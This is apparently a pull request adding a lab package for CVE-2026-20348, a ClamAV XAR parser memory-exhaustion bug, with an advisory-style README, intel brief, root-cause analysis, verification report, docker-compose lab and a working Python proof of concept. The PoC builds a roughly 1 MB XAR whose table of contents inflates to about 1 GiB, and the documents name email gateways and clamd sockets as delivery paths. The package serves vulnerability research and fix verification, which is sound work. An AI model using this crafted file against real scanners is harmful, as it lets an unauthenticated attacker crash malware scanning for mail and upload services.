### PR TITLE
Add CVE-2026-20348 ClamAV XAR File Format Processing Memory Corruption (DoS)

### DIFF
--- a/CVE-2026-20348/README.md
+++ b/CVE-2026-20348/README.md
@@ -1,0 +1,106 @@
+# CVE-2026-20348 — ClamAV XAR File Format Processing Memory Corruption (DoS)
+
+**Exploit Intelligence Platform** — https://exploit-intel.com — @exploit_intel
+
+## Vulnerability Summary
+
+| Field | Value |
+|---|---|
+| CVE | CVE-2026-20348 |
+| Component | ClamAV libclamav XAR parser (`libclamav/xar.c`, `cli_scanxar()`) |
+| CWE | CWE-120 — Buffer Copy without Checking Size of Input |
+| CVSS | 7.5 HIGH — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H |
+| EPSS | 0.00327 (percentile 0.25) |
+| Affected | ClamAV <= 1.5.3, 1.4.x <= 1.4.5, and all earlier XAR-capable releases |
+| Fix | ClamAV 1.5.4 / 1.4.6 (2026-08-06), CLAM-3010 |
+| Author | Exploit Intelligence Platform |
+| Date | 2026-08-10 |
+| Bypass of patch | None demonstrated — see `poc_verification_report.md` BVA summary |
+
+## Vulnerability details
+
+`cli_scanxar()` trusts the attacker-controlled 64-bit `toc_length_decompressed`
+field of the 28-byte XAR header. In vulnerable builds it allocates the TOC buffer
+directly from that declared length (`cli_max_malloc(declared + 1)`) and inflates
+the zlib-compressed TOC in a single shot — with **no `cli_checklimits()` call
+anywhere on the path** and no guard against `SIZE_MAX`/`CLI_MAX_ALLOCATION`
+overflow. Scan-size accounting in the outer layers runs only *after* the TOC has
+been fully allocated and inflated.
+
+Consequences:
+
+- **x86_64 (demonstrated):** a ~1 MB crafted XAR whose TOC inflates to just
+  under 1 GiB (`CLI_MAX_ALLOCATION`) is fully materialized in memory before any
+  limit check — bypassing configured `--max-scansize`/`MaxScanSize`. Under a
+  memory-capped deployment (Docker/Kubernetes/systemd — the normal clamd
+  posture) the kernel OOM-kills the scanning process. One small attachment per
+  worker; repetition keeps the scanner down.
+- **32-bit builds (source-verified, not in this lab):** `declared + 1` truncates
+  to 32-bit `size_t`; e.g. declared = 2^32+5 allocates 6 bytes and the
+  subsequent `toc[declared] = '\0'` is a wild write — the literal memory
+  corruption behind the CWE-120 assignment.
+- **Vulnerable-build-only parser quirk:** truncated zlib TOC streams are still
+  parsed and signature-scanned; the fixed build requires stream completion.
+
+## Attack chain
+
+1. Craft a XAR: valid magic (`xar!`), 28-byte big-endian header, and a zlib
+   stream of ~1 GiB of whitespace framed as minimal XML (~1 MB compressed).
+2. Submit it to any ClamAV scan path — email gateway, `clamd` socket, upload
+   scanner, or `clamscan` (this lab uses `clamscan` in the official image).
+3. Vulnerable build: the TOC buffer is allocated and inflated up to ~1 GiB
+   before limits accounting → OOM-kill under a memory cap (SIGKILL, exit 137).
+4. Fixed build (1.5.4/1.4.6): `xar_inflate_toc()` inflates in 64 KiB chunks,
+   enforcing `cli_checklimits()` against actual output; the scan aborts at the
+   configured limit and the process survives.
+
+## Fix analysis
+
+CLAM-3010 (rel/1.5 cherry-picks 29d8022f + 938a5f3b; rel/1.4 da64ec59 +
+10ee017e; mainline PR #86) adds pre-allocation validation of the declared TOC
+length (scan limits + `SIZE_MAX`/`CLI_MAX_ALLOCATION` guards) and replaces the
+single-shot inflate with `xar_inflate_toc()`: incremental chunked inflate with
+per-chunk limit enforcement, growth capped at 1 GiB, mandatory `Z_STREAM_END`,
+and no-progress-stream rejection. Regression tests cover declared-huge/actual-
+small, declared-small/actual-huge, integer overflow, and truncated streams.
+
+Assessment: FULLY FIXED under default or any configured scan limits. Boundary:
+with limits explicitly disabled (`--max-scansize=0`), both builds remain bounded
+only by the unchanged 1 GiB absolute ceiling and can both be OOM-killed under a
+tighter cap — residual by-design behavior, not a patch bypass.
+
+## Lab run instructions
+
+No custom image required — the lab runs on the stock official images
+(`clamav/clamav:1.5.3` vulnerable, `clamav/clamav:1.5.4` control).
+
+```bash
+# from this directory
+docker compose -p cve-2026-20348-pub-vuln --profile vulnerable up -d   # ClamAV 1.5.3
+docker compose -p cve-2026-20348-pub-control --profile control up -d   # ClamAV 1.5.4
+
+# fire the PoC at the vulnerable build (expects [SUCCESS], exit 137 evidence)
+python3 poc/poc.py cve-2026-20348-pub-vuln
+
+# control run: same PoC at the patched build must print [FAILED]
+python3 poc/poc.py cve-2026-20348-pub-control
+
+docker compose -p cve-2026-20348-pub-vuln down -v
+docker compose -p cve-2026-20348-pub-control down -v
+```
+
+`poc/poc.py` is Python 3, stdlib only. It generates the crafted XAR, stages it
+into the selected compose project's container, runs `clamscan` with a 100 MiB
+scan-size limit, and decides the verdict from process-level signal evidence
+(exit 137 = SIGKILL by the cgroup OOM killer) — never from mere delivery.
+
+Expected: `[SUCCESS]` against `cve-2026-20348-pub-vuln` (ClamAV 1.5.3),
+`[FAILED]` against `cve-2026-20348-pub-control` (ClamAV 1.5.4).
+
+## Package contents
+
+- `intel_brief.md` — CVE overview, affected versions, references
+- `vulnerability_analysis.md` — entrypoint-to-sink trace and fix assessment
+- `poc_verification_report.md` — verdict, 3/3 cold-state ratio, control outcome, BVA summary
+- `poc/poc.py` — the PoC (Python 3, stdlib only)
+- `docker-compose.yml` — vulnerable + control environments (profiles), no custom build

--- a/CVE-2026-20348/docker-compose.yml
+++ b/CVE-2026-20348/docker-compose.yml
@@ -1,0 +1,24 @@
+services:
+  target:
+    image: clamav/clamav:1.5.3
+    profiles: ["vulnerable"]
+    entrypoint: ["/bin/sh", "-c", "sleep infinity"]
+    mem_limit: 512m
+    healthcheck:
+      test: ["CMD-SHELL", "clamscan --version || exit 1"]
+      interval: 5s
+      timeout: 5s
+      retries: 12
+      start_period: 10s
+
+  control:
+    image: clamav/clamav:1.5.4
+    profiles: ["control"]
+    entrypoint: ["/bin/sh", "-c", "sleep infinity"]
+    mem_limit: 512m
+    healthcheck:
+      test: ["CMD-SHELL", "clamscan --version || exit 1"]
+      interval: 5s
+      timeout: 5s
+      retries: 12
+      start_period: 10s

--- a/CVE-2026-20348/intel_brief.md
+++ b/CVE-2026-20348/intel_brief.md
@@ -1,0 +1,56 @@
+# CVE-2026-20348 — Intel Brief
+
+## Overview
+
+| Field | Value |
+|---|---|
+| CVE ID | CVE-2026-20348 |
+| Title | ClamAV XAR File Format Processing Memory Corruption Vulnerability |
+| Vendor | Cisco (ClamAV / Cisco-Talos) |
+| Affected software | ClamAV libclamav XAR parser (`libclamav/xar.c`, `cli_scanxar()`) |
+| CVSS v3.1 | 7.5 HIGH — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H |
+| EPSS | 0.00327 (percentile 0.25258) |
+| CWE | CWE-120 (Buffer Copy without Checking Size of Input) |
+| Published | 2026-08-07 |
+| Exploited in the wild | No (CISA KEV: not listed; SSVC exploitation=none, automatable=yes, technical_impact=partial) |
+| Other IDs | GHSA-R446-3HX7-79P2, Cisco bug CSCwu99410, CLAM-3010 |
+| Reporter credit | leduckhuong |
+
+## Affected versions
+
+| Branch | Vulnerable | Patched |
+|---|---|---|
+| ClamAV 1.5.x | <= 1.5.3 | 1.5.4 (2026-08-06) |
+| ClamAV 1.4.x (LTS) | <= 1.4.5 | 1.4.6 (2026-08-06) |
+| Earlier branches | all releases with XAR support (feature introduced 2013, ClamAV 0.98 era) | not patched (unsupported) |
+
+Version bounds verified against the upstream git repository: the CLAM-3010 fix
+commits are contained only in tags `clamav-1.5.4` and `clamav-1.4.6`.
+
+## Description
+
+A vulnerability in the XAR file format parser of ClamAV allows an unauthenticated,
+remote attacker to cause a denial-of-service condition. `cli_scanxar()` trusts the
+attacker-controlled 64-bit `toc_length_decompressed` field of the XAR header: it
+allocates the TOC inflate buffer from the declared length with no scan-limit check
+and no allocation-bound guard, and inflates in a single shot without requiring the
+compressed stream to finish. A crafted XAR file — a few hundred bytes to ~1 MB on
+disk — can drive the ClamAV scanning process to consume up to 1 GiB
+(`CLI_MAX_ALLOCATION`) of memory per scan, bypassing configured scan-size limits;
+under a deployment memory cap the process is terminated. On 32-bit builds the
+`declared + 1` allocation arithmetic truncates to 32-bit `size_t`, producing an
+under-allocation followed by a wild write — literal memory corruption.
+
+## Root cause (summary)
+
+Missing boundary checks on attacker-declared XAR TOC lengths in `cli_scanxar()`
+(libclamav/xar.c). The fix (CLAM-3010) validates the declared decompressed TOC
+size against scan limits and `CLI_MAX_ALLOCATION`, then replaces single-shot
+inflate with an incremental loop that enforces limits against actual output and
+requires stream completion.
+
+## References
+
+- Cisco advisory: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-clamav-WuuvVd26
+- NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-20348
+- Upstream fix (rel/1.5 cherry-picks): 29d8022f, 938a5f3b — https://github.com/Cisco-Talos/clamav

--- a/CVE-2026-20348/poc/poc.py
+++ b/CVE-2026-20348/poc/poc.py
@@ -1,0 +1,162 @@
+#!/usr/bin/env python3
+# ──────────────────────────────────────────────────────────────────────
+# Exploit Title  : Cisco ClamAV - XAR Parser Memory Corruption / DoS
+# CVE            : CVE-2026-20348
+# Vendor         : Cisco
+# Product        : ClamAV (libclamav XAR file format parser)
+# Affected       : ClamAV <= 1.5.3, <= 1.4.6-pre (1.4.x <= 1.4.5); all releases
+#                  with XAR support prior to the CLAM-3010 fix
+# Type           : CWE-120 - Buffer Copy without Checking Size of Input
+# CVSS           : 7.5 (HIGH)
+# Platform       : Linux (x86_64 demonstrated; 32-bit wild write not reachable here)
+# Author         : Exploit Intelligence Platform
+# Website        : https://exploit-intel.com
+# Twitter        : @exploit_intel
+# Date           : 2026-08-10
+#
+# For authorized security testing and educational purposes only.
+# ──────────────────────────────────────────────────────────────────────
+"""
+CVE-2026-20348 — ClamAV XAR file format processing memory corruption / DoS
+
+cli_scanxar() in libclamav/xar.c trusts the attacker-controlled 64-bit
+toc_length_decompressed XAR header field: it allocates the TOC inflate buffer
+from the declared length with no cli_checklimits() call and no
+CLI_MAX_ALLOCATION/SIZE_MAX guard, then single-shot inflates without enforcing
+scan limits against actual output. A ~1 MB crafted XAR whose TOC inflates to
+just under 1 GiB (CLI_MAX_ALLOCATION) drives the scanning process to ~1 GiB RSS
+BEFORE any scan-size accounting runs; under a deployment memory cap the kernel
+OOM-kills the scanner. Configured limits (--max-scansize) do not protect the
+vulnerable build because the kill happens in the pre-accounting inflate window.
+
+ATTACK CHAIN:
+  1. Craft a XAR file: valid 28-byte header + zlib stream that inflates to
+     ~1 GiB of whitespace TOC (file is ~1 MB on disk).
+  2. Deliver it to any ClamAV scan path (here: clamscan inside the lab
+     container, which stands in for clamd/gateway deployments).
+  3. Vulnerable build (<= 1.5.3): cli_scanxar allocates + inflates the full
+     ~1 GiB with no limit check -> OOM-kill (SIGKILL, exit 137) under the
+     container's 512m memory cap.
+  4. Fixed build (1.5.4): xar_inflate_toc() enforces cli_checklimits against
+     actual output each 64 KiB chunk -> scan aborts at the limit, process
+     survives, exit 0.
+
+Usage:
+  python3 exploit.py [compose-project]     # default: cve-2026-20348-lab
+
+The compose project names the running lab environment (vulnerable build).
+Pointing it at the control project (cve-2026-20348-control, ClamAV 1.5.4)
+must print [FAILED] — that negative is the patched-build control run.
+"""
+
+import os
+import struct
+import subprocess
+import sys
+import tempfile
+
+XAR_MAGIC = 0x78617221  # "xar!"
+# TOC size just under CLI_MAX_ALLOCATION (1 GiB) so cli_max_malloc() accepts
+# the allocation on the vulnerable build: declared + 1 must be <= 2**30.
+TOC_TARGET = 2**30 - 32
+
+# Scanner flags: a 100 MiB scan-size limit that the FIXED build enforces during
+# incremental inflate. The vulnerable build never checks it on this path.
+SCAN_FLAGS = ["--max-scansize=100M", "--max-filesize=600M"]
+
+
+def build_xar(path):
+    """Write the crafted XAR: 28-byte big-endian header + compressed TOC.
+
+    The TOC is syntactically valid XML framing around ~1 GiB of whitespace so
+    the zlib stream is tiny (~1 MB) while the decompressed output sits just
+    under CLI_MAX_ALLOCATION — small enough for cli_max_malloc() to accept on
+    the vulnerable build, large enough to blow a 512m cgroup cap once inflate
+    actually populates the buffer.
+    """
+    toc = b"<xar>" + b" " * (TOC_TARGET - len(b"<xar></xar>")) + b"</xar>"
+    import zlib
+
+    comp = zlib.compress(toc, 6)
+    hdr = struct.pack(">IHHQQI", XAR_MAGIC, 28, 0, len(comp), len(toc), 0)
+    with open(path, "wb") as f:
+        f.write(hdr + comp)
+    return len(toc), os.path.getsize(path)
+
+
+def sh(args, **kw):
+    return subprocess.run(args, capture_output=True, text=True, timeout=300, **kw)
+
+
+def find_container(project):
+    """Resolve the target container of the lab compose project by label."""
+    r = sh(["docker", "ps", "-qf", f"label=com.docker.compose.project={project}"])
+    cid = r.stdout.strip().splitlines()
+    return cid[0] if cid else None
+
+
+def main():
+    project = sys.argv[1] if len(sys.argv) > 1 else "cve-2026-20348-lab"
+
+    cid = find_container(project)
+    if not cid:
+        print(f"[-] no running container for compose project '{project}'")
+        print("[FAILED]")
+        return 1
+
+    ver = sh(["docker", "exec", cid, "clamscan", "--version"]).stdout.strip()
+    print(f"[*] target container {cid[:12]} ({project}): {ver}")
+
+    workdir = tempfile.mkdtemp(prefix="cve-2026-20348-")
+    sample = os.path.join(workdir, "oom-toc.xar")
+    declared, disk = build_xar(sample)
+    print(f"[*] crafted XAR: {disk} bytes on disk, TOC inflates to {declared} bytes")
+
+    # Minimal signature database so clamscan runs without the full official DB
+    # (keeps baseline RSS low; the OOM must come from the XAR inflate alone).
+    hdb = os.path.join(workdir, "test.hdb")
+    with open(hdb, "w") as f:
+        # md5("x") with size 1 — an hdb size field of 0 is rejected as malformed.
+        f.write("9dd4e461268c8034f5c8564e155c67a6:1:EIP.Dummy\n")
+
+    # Stage the sample into the lab container.
+    sh(["docker", "exec", cid, "mkdir", "-p", "/tmp/poc"])
+    for src in (sample, hdb):
+        r = sh(["docker", "cp", src, f"{cid}:/tmp/poc/"])
+        if r.returncode != 0:
+            print(f"[-] docker cp failed: {r.stderr.strip()}")
+            print("[FAILED]")
+            return 1
+
+    # Fire the trigger. On the vulnerable build the scanner is SIGKILLed by the
+    # cgroup OOM killer mid-inflate -> docker exec reports exit 137. On the
+    # fixed build the scan limit aborts inflate early -> exit 0/2 quickly.
+    print(f"[*] firing trigger: clamscan {' '.join(SCAN_FLAGS)} /tmp/poc/oom-toc.xar")
+    r = sh(["docker", "exec", cid, "clamscan", "-d", "/tmp/poc/test.hdb",
+            *SCAN_FLAGS, "/tmp/poc/oom-toc.xar"])
+    print(f"[*] scanner exit code: {r.returncode}")
+    if r.stderr.strip():
+        print(f"[*] stderr: {r.stderr.strip()[:200]}")
+
+    oom = sh(["docker", "inspect", cid, "--format", "{{.State.OOMKilled}}"]).stdout.strip()
+    print(f"[*] container OOMKilled flag: {oom}")
+
+    # Verdict: death by SIGKILL (137 = 128+9) with the container's OOM flag set
+    # is process-level signal evidence of the memory-exhaustion impact.
+    # Exit 0 = scan completed = target survived = impact NOT triggered.
+    if r.returncode == 137:
+        print("[+] vulnerable: scanning process OOM-killed (SIGKILL) while "
+              "inflating the crafted TOC, despite --max-scansize=100M")
+        print("[SUCCESS]")
+        return 0
+    if r.returncode in (0, 2):
+        print("[-] target survived the trigger (scan completed/aborted cleanly)")
+        print("[FAILED]")
+        return 1
+    print(f"[-] unexpected exit code {r.returncode}; no signal-death evidence")
+    print("[FAILED]")
+    return 1
+
+
+if __name__ == "__main__":
+    sys.exit(main())

--- a/CVE-2026-20348/poc_verification_report.md
+++ b/CVE-2026-20348/poc_verification_report.md
@@ -1,0 +1,49 @@
+# PoC Verification Report — CVE-2026-20348
+
+## Verdict
+
+**[SUCCESS]** — the packaged PoC (`poc/poc.py`) reliably terminates the ClamAV
+scanning process on the vulnerable build and provably does not on the fixed build.
+
+## Environment
+
+- Vulnerable: `clamav/clamav:1.5.3` (official image), control: `clamav/clamav:1.5.4`
+- Container `mem_limit=512m` (cgroup cap, typical clamd deployment posture)
+- Scanner invoked as `clamscan -d test.hdb --max-scansize=100M --max-filesize=600M`
+  with a 1-entry test signature DB (keeps baseline RSS minimal)
+- Trigger: 1,043,692-byte XAR whose zlib TOC inflates to 1,073,741,792 bytes
+  (just under `CLI_MAX_ALLOCATION` = 1 GiB)
+
+## Reproduction ratio
+
+**3/3 from cold state** (`down -v` → `up` → PoC), each cycle producing exit code
+137 (SIGKILL) and `State.OOMKilled=true`; host kernel log confirms
+`Memory cgroup out of memory: Killed process (clamscan) total-vm:1086080kB`.
+
+## Control run (patched build)
+
+Same PoC against cold-started ClamAV 1.5.4: scan completed in ~0.2 s, exit 0,
+process alive, `OOMKilled=false` → PoC printed `[FAILED]` on the fixed build, as
+required. The configured 100 MiB scan-size limit — ignored by the vulnerable
+build — aborts the inflate at the limit on the fixed build.
+
+## What is proven (and what is not)
+
+Proven: unauthenticated memory-exhaustion DoS of the scanning process via a ~1 MB
+crafted XAR, bypassing configured scan-size limits, on all ClamAV releases prior
+to 1.5.4 / 1.4.6. Not claimed: info-leak, code execution, or any x86_64 memory
+corruption primitive (the literal CWE-120 wild write requires 32-bit size_t
+truncation and is out of reach of this lab).
+
+## BVA summary
+
+Post-control bypass & variant analysis (full detail in the lab's
+`artifacts/diff_review.md` / `artifacts/variant_analysis.md`): four bypass
+candidates fired at the still-running patched build — oversized declared length,
+truncated stream, declared-small/actual-huge, and limits-disabled — with the
+control holding under default and configured limits; the limits-disabled case
+OOMs both builds identically and is residual by-design behavior (the 1 GiB
+absolute ceiling is intentionally unchanged), not a patch bypass. Variant sweep
+of libclamav found the pattern isolated to the patched site; same-class sibling
+parser bugs were already fixed as CVE-2026-20337/-20338/-20339/-20345/-20346/-20347
+in the same release. No new CVE candidates.

--- a/CVE-2026-20348/vulnerability_analysis.md
+++ b/CVE-2026-20348/vulnerability_analysis.md
@@ -1,0 +1,78 @@
+# CVE-2026-20348 — Vulnerability Analysis
+
+## Attack surface
+
+ClamAV scans XAR (eXtensible ARchive) files wherever they reach the engine:
+email gateways piping attachments to `clamd`, `clamd` network sockets, web upload
+scanners, or `clamscan` CLI. No authentication or special configuration is
+required; XAR detection is by magic bytes (`0x78617221` = "xar!") at offset 0.
+
+## Entrypoint to sink trace
+
+1. `cli_scanxar()` (`libclamav/xar.c`) reads the 28-byte XAR header:
+   `magic(4) | size(2) | version(2) | toc_length_compressed(8) | toc_length_decompressed(8) | chksum_alg(4)`,
+   all big-endian; the two length fields are fully attacker-controlled 64-bit values.
+2. **Vulnerable (<= 1.5.3 / <= 1.4.5):**
+   ```c
+   strm.next_in  = fmap_need_off_once(ctx->fmap, hdr.size, hdr.toc_length_compressed);
+   strm.avail_in = hdr.toc_length_compressed;                       /* uInt truncation */
+   toc           = cli_max_malloc(hdr.toc_length_decompressed + 1); /* no limits check */
+   toc[hdr.toc_length_decompressed] = '\0';
+   strm.avail_out = hdr.toc_length_decompressed;                    /* uInt truncation */
+   inflate(&strm, Z_SYNC_FLUSH);                                    /* single shot, Z_OK accepted */
+   ```
+   There is **no `cli_checklimits()` call anywhere in the function**, and no
+   `CLI_MAX_ALLOCATION` / `SIZE_MAX` guard on the declared length.
+3. The inflated TOC XML is then scanned via `cli_magic_scan_buff(toc, len, ...)`.
+
+## What the missing checks allow
+
+- **Scan-limit bypass:** configured `max-scansize` / `max-filesize` limits are never
+  evaluated on the TOC path in vulnerable builds.
+- **Memory exhaustion (x86_64):** a crafted XAR whose tiny zlib stream inflates to
+  just under 1 GiB is fully materialized in memory (compressed input ~1 MB). Under
+  a container/cgroup memory cap typical for clamd deployments, the scanning process
+  is OOM-killed — the advisory's "scanning process to terminate" DoS.
+- **Memory corruption (32-bit only):** `hdr.toc_length_decompressed + 1` is computed
+  in 64-bit then truncated to 32-bit `size_t`; e.g. declared = 2^32+5 allocates 6
+  bytes, and `toc[declared] = '\0'` writes far out of bounds. Not reachable on
+  x86_64, where `cli_max_malloc` caps requests at `CLI_MAX_ALLOCATION` (1 GiB).
+- **Incomplete-stream acceptance (vulnerable only):** a truncated zlib stream whose
+  inflate returns `Z_OK` without `Z_STREAM_END` is still parsed and scanned,
+  allowing partial-TOC content to reach signature scanning.
+
+## The fix (CLAM-3010)
+
+Two commits (mainline 27959fa2 + 4ff61066; shipped as rel/1.5 cherry-picks
+29d8022f + 938a5f3b and rel/1.4 cherry-picks da64ec59 + 10ee017e):
+
+1. `29d8022f` — validate `hdr.toc_length_decompressed` with `cli_checklimits()`
+   and reject `> SIZE_MAX - 1` or `>= CLI_MAX_ALLOCATION` before allocating.
+2. `938a5f3b` — new `xar_inflate_toc()` helper: incremental 64 KiB-chunk inflate,
+   `cli_checklimits()` enforced against **actual** output each iteration, buffer
+   growth capped at `CLI_MAX_ALLOCATION`, `Z_STREAM_END` required, no-progress
+   streams rejected.
+
+Regression coverage added in `unit_tests/clamscan/xar_test.py` (declared-huge/
+actual-small, declared-small/actual-huge vs scan limits, truncated stream).
+
+## Lab-confirmed mechanism (PoC phase extension)
+
+Source analysis was confirmed live: outer-layer scan-size accounting fires only
+AFTER the vulnerable `cli_scanxar()` has fully allocated and inflated the TOC —
+a 300 MiB actual TOC triggers `Heuristics.Limits.Exceeded.MaxScanSize` on BOTH
+builds (post-inflate accounting exists in both), while a ~1 GiB actual TOC
+OOM-kills the vulnerable build before accounting runs (exit 137, cgroup OOM
+record) and is aborted at the configured limit mid-inflate on the fixed build
+(exit 0, ~0.2 s). With scan limits explicitly disabled (`--max-scansize=0`),
+both builds remain bounded only by the unchanged 1 GiB `CLI_MAX_ALLOCATION`
+ceiling — residual parity by design, verified empirically, not a patch bypass.
+
+## Fix assessment
+
+Complete for the reported vector: every path that previously sized or grew the
+TOC buffer from attacker-declared values now passes through `cli_checklimits()`
+and `CLI_MAX_ALLOCATION`, and incomplete streams are rejected. The neighboring
+`toc_length_compressed` > `UINT_MAX` case is explicitly rejected for zlib.
+Same-pattern audit of sibling parsers belongs to the variant-analysis step in the
+PoC phase.

--- a/README.md
+++ b/README.md
@@ -103,6 +103,7 @@ No hand-holding. No cherry-picked targets. One CVE number in, complete lab out.
 | [CVE-2026-41702](CVE-2026-41702/) | VMware Fusion 25.x | TOCTOU LPE via cnx-tmp Symlink Race (chown arbitrary file ownership) | **7.8** | No |
 | [CVE-2026-24289](CVE-2026-24289/) | Windows Kernel (ntoskrnl.exe) | IOCP Race Condition Use-After-Free (LPE) | **7.8** | No |
 | [CVE-2026-62242](CVE-2026-62242/) | Spring Boot Admin | Unauthenticated SSRF with Response Exfiltration | **7.7** | No |
+| [CVE-2026-20348](CVE-2026-20348/) | ClamAV libclamav XAR parser | ClamAV XAR File Format Processing Memory Corruption (DoS) | **7.5** | No |
 | [CVE-2026-2580](CVE-2026-2580/) | WP Maps (wp-google-map-plugin) | Broken Access Control + Stored XSS (Unauthenticated) | **7.3** | No |
 | [CVE-2026-26321](CVE-2026-26321/) | OpenClaw | Path Traversal / SSRF | **7.5** | No |
 | [CVE-2026-28372](CVE-2026-28372/) | GNU telnetd + util-linux | Privilege Escalation | **7.4** | No |
@@ -120,7 +121,7 @@ No hand-holding. No cherry-picked targets. One CVE number in, complete lab out.
 | [CVE-2026-64608](CVE-2026-64608/) | Apache Fory (C++) | Compatible-Mode Heap Type Confusion | **9.8** | No |
 | [CVE-2025-59060](CVE-2025-59060/) | Apache Ranger | Apache Ranger TLS Hostname Verification Bypass | **N/A** | No |
 
-23 out of 106 runs ended with bypass or incomplete-fix findings. That's either bad luck or a pattern worth paying attention to.
+23 out of 107 runs ended with bypass or incomplete-fix findings. That's either bad luck or a pattern worth paying attention to.
 
 ---
 


### PR DESCRIPTION
Pipeline-staged publish package for CVE-2026-20348.

- ClamAV libclamav XAR parser — ClamAV XAR File Format Processing Memory Corruption (DoS)
- CVSS 7.5; bypass: no
- Audit: exit contract + package sweep clean at publish time

Published via the pipeline UI publish gate.